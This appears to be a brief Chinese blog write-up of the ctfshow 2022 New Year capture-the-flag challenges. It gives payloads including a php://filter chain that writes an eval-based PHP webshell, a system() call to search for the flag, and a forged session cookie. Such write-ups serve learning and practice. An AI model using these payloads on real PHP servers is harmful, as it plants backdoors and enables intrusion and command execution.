0
点赞
收藏
分享

微信扫一扫

ctfshow_新春欢乐赛2022

认真的老去 2022-02-03 阅读 68
php

不泄露wp每晚9点更新

热身

?f=phpinfo();

在里面找到secret文件,里面有flag

web1

?content=php://filter/<?|string.strip_tags|convert.base64-decode/resource=?>PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B/../3.php
PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B  ----->
PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+    ----->
<?php eval($_POST[1]);?>
1=system("find / -name fl*");
在/flag.txt

web2

Post
session_id=session_id
Cookie
PHPSESSID=HappyNewYear
举报

相关推荐

0 条评论